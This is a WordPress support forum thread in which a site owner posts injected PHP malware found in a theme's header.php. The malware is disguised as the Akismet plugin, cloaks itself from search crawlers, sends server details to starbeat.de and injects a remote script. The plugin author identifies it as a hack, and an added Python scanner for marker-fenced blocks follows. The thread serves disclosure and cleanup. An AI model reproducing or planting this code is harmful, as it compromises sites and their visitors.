• Resolved nickth

    (@nickth)


    I found an iframe code in my site, noticed status bar was trying to connect to starbeat.de, and then downloaded all the files from the server and searched for starbeat.de and found this code which I’ve never seen in the header.php file before! Akismet is a plugin with its own files not in the theme!

    <body <?php body_class(); ?>>
    <?php
    #a08bd5#
    /**
     * @package Akismet
     */
    /*
    Plugin Name: Akismet
    Plugin URI: http://akismet.com/
    Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
    Version: 3.0.0
    Author: Automattic
    Author URI: http://automattic.com/wordpress-plugins/
    License: GPLv2 or later
    Text Domain: akismet
    */
    
    /*
    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.
    
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
    
    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
    */
    
    if( empty( $su ) ) {
        if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
                "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
                $_SERVER['HTTP_USER_AGENT']
            )
        ) {
        } else {
            error_reporting( 0 );
            @ini_set( 'display_errors', 0 );
            if( !function_exists( '__url_get_contents' ) ) {
                function __url_get_contents( $remote_url, $timeout )
                {
                    if( function_exists( 'curl_exec' ) ) {
                        $ch = curl_init();
                        curl_setopt( $ch, CURLOPT_URL, $remote_url );
                        curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                        curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
                        curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
                        $_url_get_contents_data = curl_exec( $ch );
                        curl_close( $ch );
                    } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
                        $ctx = @stream_context_create(
                            array(
                                'http' =>
                                    array(
                                        'timeout' => $timeout,
                                    )
                            )
                        );
                        $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
                    } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
                        $handle = @fopen( $remote_url, "r" );
                        $_url_get_contents_data = @stream_get_contents( $handle );
                    } else {
                        $_url_get_contents_data = __file_get_url_contents( $remote_url );
                    }
                    return $_url_get_contents_data;
                }
            }
    
            if( !function_exists( '__file_get_url_contents' ) ) {
                function __file_get_url_contents( $remote_url )
                {
                    if( preg_match(
                        '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                        $remote_url,
                        $matches
                    )
                    ) {
                        $protocol = strtolower( $matches[1] );
                        $host = $matches[2];
                        $path = $matches[3];
                    } else {
    // Bad remote_url-format
                        return false;
                    }
                    if( $protocol == "http" ) {
                        $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
                    } else {
    // Bad protocol
                        return false;
                    }
                    if( !$socket ) {
    // Error creating socket
                        return false;
                    }
                    $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                    $len_written = @fwrite( $socket, $request );
                    if( $len_written === false || $len_written != strlen( $request ) ) {
    // Error sending request
                        return false;
                    }
                    $response = "";
                    while( !@feof( $socket ) &&
                        ( $buf = @fread( $socket, 4096 ) ) !== false ) {
                        $response .= $buf;
                    }
                    if( $buf === false ) {
    // Error reading response
                        return false;
                    }
                    $end_of_header = strpos( $response, "\r\n\r\n" );
                    return substr( $response, $end_of_header + 4 );
                }
            }
    
            $su['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
            $su['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
            $su['PHP_SELF'] = $_SERVER['PHP_SELF'];
            $su['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
            $su['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
            $su['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
            $su['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
            $su['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];
    
            $su = __url_get_contents(
                "http://starbeat.de/f6f23dqg.php" . "?fid=2281358&info=" . http_build_query( $su ) . "&no=1&allow=1",
                2
            );
    
            $su = trim( $su );
            if( $su !== 'false' ) {
                echo "<script type=\"text/javascript\" src=\"http://starbeat.de/f6f23dqg.php?id=8234289\"></script>";
            }
        }
    }
    #/a08bd5#
    ?>

    https://wordpress.org/plugins/akismet/

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Christopher Finke

    (@cfinke)

    That’s not actually Akismet; it’s a hack attempting to masquerade as Akismet in the hopes that fewer people will remove it.

    You should take a look at the “My site was hacked” FAQ and follow the directions there: http://codex.wordpress.org/FAQ_My_site_was_hacked Certainly remove all of the code between the #a08bd5# lines.
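
Added example, not part of the original thread and not Akismet or WordPress code: a Python scanner that locates blocks fenced by a matching `#id#` / `#/id#` marker pair, like the `#a08bd5#` lines above, in a downloaded copy of a site and returns the text with those blocks removed. It assumes the marker id is six hex characters as in the posted sample; the function names, the trait labels and the `injected.example` host are made up for illustration.

```python
import re
from pathlib import Path

# Opening "#a08bd5#" and closing "#/a08bd5#" marker lines sharing one id.
# Assumption: the id is 6 hex characters, as in the sample posted above.
BLOCK_RE = re.compile(
    r"^[ \t]*#([0-9a-f]{6})#[ \t]*\r?\n.*?^[ \t]*#/\1#[ \t]*(?:\r?\n|$)",
    re.S | re.M | re.I)
TRAITS = {  # traits of the posted sample, used only to annotate a hit
    "crawler_cloaking": re.compile(r"googlebot\|msnbot", re.I),
    "remote_fetch": re.compile(r"curl_exec|file_get_contents|fsockopen", re.I),
    "script_echo": re.compile(r"""echo\s+["']<script""", re.I),
}

def find_marker_blocks(text):
    """Return one dict per marker-delimited block found in text."""
    hits = []
    for m in BLOCK_RE.finditer(text):
        body = m.group(0)
        first = text.count("\n", 0, m.start()) + 1
        hits.append({
            "marker": m.group(1).lower(),
            "first_line": first,
            "last_line": first + body.rstrip("\r\n").count("\n"),
            "traits": sorted(k for k, rx in TRAITS.items() if rx.search(body)),
        })
    return hits

def strip_marker_blocks(text):
    """Return text with every marker-delimited block removed, markers included."""
    return BLOCK_RE.sub("", text)

def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Map each matching file under root to the marker blocks found in it."""
    files = (p for p in sorted(Path(root).rglob("*"))
             if p.is_file() and p.suffix.lower() in suffixes)
    found = ((str(p), find_marker_blocks(p.read_text(errors="replace"))) for p in files)
    return {name: hits for name, hits in found if hits}

# Constructed sample: a cut-down header.php with a placeholder host.
SAMPLE = """<body <?php body_class(); ?>>
<?php
#a08bd5#
if( !preg_match( "/(googlebot|msnbot)/i", $_SERVER['HTTP_USER_AGENT'] ) ) {
    $su = file_get_contents( "http://injected.example/x.php" );
    echo '<script src="http://injected.example/x.php"></script>';
}
#/a08bd5#
?>
"""
```

A hit in any file means that file was modified by someone other than the site owner, so the steps in the FAQ linked above still apply after the block is removed.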

    Thread Starter nickth

    (@nickth)

    Yeah I removed it. I also posted it here for the benefit of others who may experience this.

    Guido

    (@guido07111975)

    Have the same issue, with multiple sites 🙁

    I also first thought Akismet has something to do with this..

    Guido

  • The topic ‘Akismet in header, Starbeat.de, iframe Internet Explorer IE’ is closed to new replies.